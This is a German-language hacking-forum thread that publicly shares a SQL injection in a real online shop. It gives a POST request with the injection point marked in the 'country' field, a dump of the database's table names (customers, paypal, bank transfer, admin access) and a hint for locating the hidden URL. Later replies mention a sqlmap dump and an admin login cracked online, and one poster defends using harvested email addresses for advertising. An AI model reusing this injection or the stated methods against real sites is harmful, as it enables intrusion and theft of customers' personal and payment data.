8 Antworten in diesem Thema

[Bus1ness Junkie]

URL:

Please Login HERE or Register HERE to see this link!

POST:

action=process&city=San%20Francisco&company=Acunetix&country=%Inject_Here%&dob=1&email_address=3137%20Laguna%20Street&email_address_valid=3137%20Laguna%20Street&fax=317-317-3137&firstname=oacvpeoi&gender=m&lastname=oacvpeoi&postcode=94102&street_address=3137%20Laguna%20Street&suburb=1&telephone=555-666-0606&vat=1

DB: usr_web1_1

address_book
address_format
admin_access
affiliate_affiliate
affiliate_banners
affiliate_banners_history
affiliate_clickthroughs
affiliate_payment
affiliate_payment_status
affiliate_payment_status_history
affiliate_sales
attributes
attributes_values
banktransfer
banktransfer_20140218_ohne_IBAN
banktransfer_blz
banners
banners_history
bestellhinweis_popup
campaigns
campaigns_ip
card_blacklist
categories
categories_20140918
categories_description
categories_description_20140918
categories_to_attributes
categories_to_attributes_values
cm_file_flags
configuration
configuration_20130723
configuration_20140815
configuration_20140928
configuration_group
content_manager
counter
counter_history
countries
coupon_email_track
coupon_email_track_hack
coupon_gv_customer
coupon_gv_queue
coupon_redeem_track
coupons
coupons_description
coupons_hack
currencies
customers
customers_basket
customers_basket_attributes
customers_info
customers_ip
customers_memo
customers_status
customers_status_history
database_version
exportprotokoll
geo_zones
languages
last_export
manufacturers
manufacturers_info
media_content
module_newsletter
module_newsletter_temp_1
module_newsletter_temp_3
newsletter_recipients
newsletters
newsletters_history
orders
orders_products
orders_products_attributes
orders_products_download
orders_recalculate
orders_status
orders_status_20140219
orders_status_history
orders_total
payment_moneybookers
payment_moneybookers_countries
payment_moneybookers_currencies
payment_payone
payment_payone_history
payment_qenta
paypal
paypal_status_history
personal_offers_by_customers_status_0
personal_offers_by_customers_status_1
personal_offers_by_customers_status_2
personal_offers_by_customers_status_3
products
products_20100209_utf8
products_20140924
products_attributes
products_attributes_cache
products_attributes_download
products_content
products_description
products_description_20140924
products_graduated_prices
products_images
products_images_20130521
products_images_20140924
products_notifications
products_options
products_options_values
products_options_values_to_products_options
products_to_attributes_values
products_to_categories
products_vpe
products_warengruppe
products_xsell
products_xsell_grp_name
reviews
reviews_description
schufa_status
sessions
shipping_status
shop
shopdomain
specials
staffel_templates
staffel_to_templates
tax_class
tax_rates
text_zusatzprodukte
textbausteine
whos_online
zones
zones_to_geo_zones

[myman]

Danke für den Link. Mit welcher Acunetix Version hast du gescannt ? Post-Injections finde ich immer weniger.

BTW für andere die sich an der Injection versuchen wollen ist der HLink hinten mit einer 1 am ende und für zu ner 404 Page

Bearbeitet von freshman666, 04 October 2014 - 14:25 Uhr.

[Bus1ness Junkie]

Ich habes mit der

Version 9.5 gemacht

[FalkE]

danke für diese unqualitative via acunetix erscannte lücke, die über sqlmap erzeugte auflistung der tables und den per cmd5.org gecrackten admin login

[Becks]

danke für diese unqualitative via acunetix erscannte lücke, die über sqlmap erzeugte auflistung der tables und den per cmd5.org gecrackten admin login

Das fasst hier aber ALLE geposteten Lücken zusammen

[myman]

Unqualitativ ist nun wirklich was anderes! Die Art und Weise wie die Lücke gefunden wurde mag dir vielleicht missfallen, aber warum das Rad neu erfinden, wenn es bereits rollt ? @ FalkE , suchst du deine Injections noch von Hand ? Nur wenn man einen gezielten Kundenkreis hat, macht es wirklich Sinn händisch das Ziel zu analysieren.

BTW: Dein Post hat außer einem + mehr auf deinem Counter keinen Mehrwert für die Community. Was willst du stattdessen? Das nichts gepostet wird?
Habe das mal gemeldet weil ich das wirklich daneben finde.

Bearbeitet von freshman666, 04 October 2014 - 23:09 Uhr.

[FalkE]

Unqualitativ ist nun wirklich was anderes! Die Art und Weise wie die Lücke gefunden wurde mag dir vielleicht missfallen, aber warum das Rad neu erfinden, wenn es bereits rollt ? @ FalkE , suchst du deine Injections noch von Hand ? Nur wenn man einen gezielten Kundenkreis hat, macht es wirklich Sinn händisch das Ziel zu analysieren.

BTW: Dein Post hat außer einem + mehr auf deinem Counter keinen Mehrwert für die Community. Was willst du stattdessen? Das nichts gepostet wird?
Habe das mal gemeldet weil ich das wirklich daneben finde.

du ich wünsch dir schönes weiterdumpen von `paypal`
laut den boardregeln ist fraud verboten, für was braucht man diese lücke hier, wenn nicht um den sql dumper anzuschmeissen und den shit anschließend auf kiddynetwork gegen ein paar euronen zu verticken.

meiner meinung nach gehört der threadinhaber gebannt und dein unqualifizierter post entfernt.
anstänge vulns findet man nur per hand, basierend auf eigenem wissen und daraus resultierender anwendung. acunetix scannt ein archiv ab. du findest entweder fals/pos oder error-based get/post parameter.

ich möchte mit diesem beitrag mal wieder richtung ursprung toolbase und den sinn der ganzen sache herangehen.
heute ist nur noch wichtig wie komme ich an die daten oder wie oder was? es geht doch um die lücke und wie diese exploiten.

das rätzel das der hacker knackt, sich zu beweisen, ich bin besser als der programmierer der page.
wen interessiert die db? wen interessiert irgendwelche scheiss paypals in den tables? du mein freund bist das typische beispiel für einen dreckigen leecher, weswegen ich hier auch nix share an lücken und co.

diese erscannte scheisse ist weder ein erfolg noch bringt sie jemanden was (da anti fraud forum hier weißte), noch ist sie interessant.
es ist 0815 shit, trägt den namen gartencenter-shop24 und verschmutzt meiner meinung nach das forum für vulns.

ich kann hier auch 20 threads erstellen mit sqlis wie heinz-biergarten.de und babytaschen-gebraucht-paypal.net.
und jetzt würde mich mal interessieren wem das was bringt? dir (dem leecher) oder mir dem an der materie/wissen interessierten?

Bearbeitet von FalkE, 04 October 2014 - 23:28 Uhr.

[myman]

Wie genau kommst du auf den Rückschluss, ich sei ein "vertickender leecher" ? Wurde dir dein WoW Account mal geklaut durch ein Board-Lücke oder warum bist du so aggressiv ?

Ist es dir vielleicht mal in den Sinn gekommen, eMail Adressen für Werbezwecke zu nutzen ? Das mag vielleicht Wettbewerbsmäßig verboten sein, aber ein Schaden entsteht dadurch niemandem.

Darf ich dich fragen, was genau du hier auf dem Board machst. Irgendwer hat bei fast allem hier einen Schaden. Wenn du ein Coding Forum suchst, gibt es da sicher bessere Alternativen.

[Dr. Spic]

So jetzt ist schluss gier! Wenn euch so ein Thread nicht passt, dann öffnet doch den Thread nicht! Ganz einfach! Auch im Urlaub kann ich Verwarnungen verteilen! Wenn noch irgend jemand hier rumjammert, schwing ich den Bannhammer!

Falke und Becks wegen Spam verwarnt! Nicht zu glauben! Ihr seid doch keine 12 mehr! >_>